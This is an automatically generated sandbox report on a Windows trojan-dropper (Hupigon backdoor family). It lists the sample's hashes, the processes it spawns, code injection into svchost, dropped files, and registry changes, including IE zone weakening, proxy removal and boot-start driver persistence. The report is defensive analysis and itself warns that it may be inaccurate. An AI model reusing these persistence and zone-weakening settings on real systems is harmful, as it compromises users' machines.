Trojan.Win32.Delphi_079f56ead4

by malwarelabrobot on April 17th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjw (Kaspersky), Backdoor.Hupigon.64371 (B) (Emsisoft), Backdoor.Hupigon.64371 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor, VirTool


This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.

MD5: 079f56ead49c756a3b3252c448b9ffd5
SHA1: 591dc67706272cc3301c19bb96b10d22e6cf5573
SHA256: f75b415a68f6d0b292a9f7f2a77bbdb5ca23a78bffac69665a42a7fbe57577e1
SSDeep: 24576:mKsoFg9ZYBcIZld7XgcTmFZO6mYeVfuS/t04u1:IoFdcm8O/hnF03
Size: 846257 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: Plus HD
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

soft256.exe:2724
cnnic_1009.exe:2892
m4.exe:2840
update.exe:3408
setup.exe:2200
setup.exe:3476
setup.exe:3264
%original file name%.exe:1712
idnsvr.exe:4052

The Trojan injects its code into the following process(es):

svchost.exe:1992

File activity

The process soft256.exe:2724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\e1JePg78g.dll (33 bytes)

The process cnnic_1009.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\setup.exe (12214 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)

The process m4.exe:2840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\MP3\svchost.exe (1281 bytes)

The process update.exe:3408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)

The process setup.exe:2200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\OCINS\convf.dll (1281 bytes)
%Program Files%\OCINS\replace.dat (343 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\cuscfg.dat (145 bytes)
%Program Files%\OCINS\ctrcfg.ini (230 bytes)
%Program Files%\OCINS\cnrbtn.html (486 bytes)
%System%\drivers\idnaux.sys (10 bytes)
%Program Files%\OCINS\version.dat (482 bytes)
%Program Files%\OCINS\kwrep.dat (191 bytes)
%Program Files%\OCINS\idnaux.dat (39 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\srchsp.dll (32 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
%WinDir%\ocinfo.dat (8 bytes)
%System%\idnreg.dll (36 bytes)
%Program Files%\OCINS\addrmsg.dll (601 bytes)
%Program Files%\OCINS\addrmsg.ini (6 bytes)

The process setup.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\OCINS\cnprovh.dll (601 bytes)
%Program Files%\OCINS\convs.dll (601 bytes)
%Program Files%\OCINS\cndsv.dll (601 bytes)
%Program Files%\OCINS\config.exe (601 bytes)
%Program Files%\OCINS\cuscfg.dat (148 bytes)
%Program Files%\OCINS\ctrcfg.ini (2949 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\idnsvr.exe (601 bytes)
%Program Files%\OCINS\version.dat (479 bytes)
%Program Files%\OCINS\idnsvr.dll (601 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%Program Files%\OCINS\usrcfg.ini (21 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)

The process setup.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)

The process %original file name%.exe:1712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

The process idnsvr.exe:4052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\OCINS\update\version.dat (482 bytes)
%Program Files%\OCINS\ctrcfg.ini (4 bytes)
%Program Files%\OCINS\austr.dll (65 bytes)
%Program Files%\OCINS\update\data2.cab (9696 bytes)
%Program Files%\OCINS\update\update.exe (273697 bytes)
%Program Files%\OCINS\update\austr.dll (1568 bytes)
%Program Files%\OCINS\usrcfg.ini (130 bytes)

Registry activity

The process soft256.exe:2724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 6A BD 7E 02 BF AD 37 FC 88 F7 6F 47 B3 F0 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process cnnic_1009.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FC 7A E9 19 9A 0B 73 CD 3F F6 01 BC D3 68 3D"

[HKLM\SOFTWARE\kmedia\cnnic]
"1.0" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"setup.exe" = "国际化域名支持"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE security zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

The process m4.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 32 64 65 C7 93 9C 01 27 E3 B3 E7 E3 4E 94 5F"

The process update.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F F0 AD 61 62 B6 59 56 4D 15 69 3D E1 82 EA FD"

The process setup.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\idnaux]
"ErrorControl" = "1"
"ImagePath" = "system32\drivers\idnaux.sys"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Default Visible" = "Yes"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"

[HKCR\Idnreg.IdnObj.1]
"(Default)" = "IdnObj Class"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\0\win32]
"(Default)" = "%System%\idnreg.dll"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"Version" = "1.0"

[HKCR\Idnreg.IdnObj.1\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"

[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\HELPDIR]
"(Default)" = "%System%\"

[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"(Default)" = "%Program Files%\OCINS\cnrbtn.html"

[HKLM\System\CurrentControlSet\Services\cnprov]
"Group" = "Boot System Extenders"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"

[HKLM\System\CurrentControlSet\Services\idnaux]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"

[HKLM\System\CurrentControlSet\Services\idnaux\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"

[HKCR\Idnreg.IdnObj]
"(Default)" = "IdnObj Class"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}]
"(Default)" = "IIdnObj"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DescriptionName" = "idnaux"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"

[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"Contexts" = "127"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DependOnService" = "Tcpip"

[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0]
"(Default)" = "idnreg 1.0 Type Library"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\VersionIndependentProgID]
"(Default)" = "Idnreg.IdnObj"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}]
"(Default)" = "CNNIC_IDN"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DisplayName" = "idnaux"

[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"

[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"

[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"

[HKLM\System\CurrentControlSet\Services\cnprov]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\idnaux]
"Group" = "PNP_TDI"

[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 B5 88 65 78 1A 57 62 B3 A9 DB D6 52 6D B3 41"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\ProgID]
"(Default)" = "Idnreg.IdnObj.1"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"

[HKCR\Idnreg.IdnObj\CurVer]
"(Default)" = "Idnreg.IdnObj.1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "@\??\%System%\@c:\windows\system32\setup.exe.tmp, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3\idnsvr.exe, !\??\%Program Files%\OCINS\idnsvr.exe"

[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Idnreg.IdnObj\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"

[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"

[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"

[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"(Default)" = "%System%\idnreg.dll"

The following driver will be automatically launched by the OS Loader:

[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\idnaux]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\Programmable]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"

[HKCU\Console]
"KwUnSelf"

[HKLM\System\CurrentControlSet\Services\cnprov]
"SystemRoot"

[HKLM\System\CurrentControlSet\Services\idnaux]
"DeleteFlag"

The process setup.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.0"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\0\win32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"
"Default Visible" = "Yes"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"

[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"

[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"
"Group" = "Boot System Extenders"

[HKLM\SOFTWARE\OCINS]
"InstallPath" = "%Program Files%\OCINS"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0]
"(Default)" = "IEAux 1.0 Type Library"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"

[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation2.6.0.0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"

[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IIEHlprObj"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"

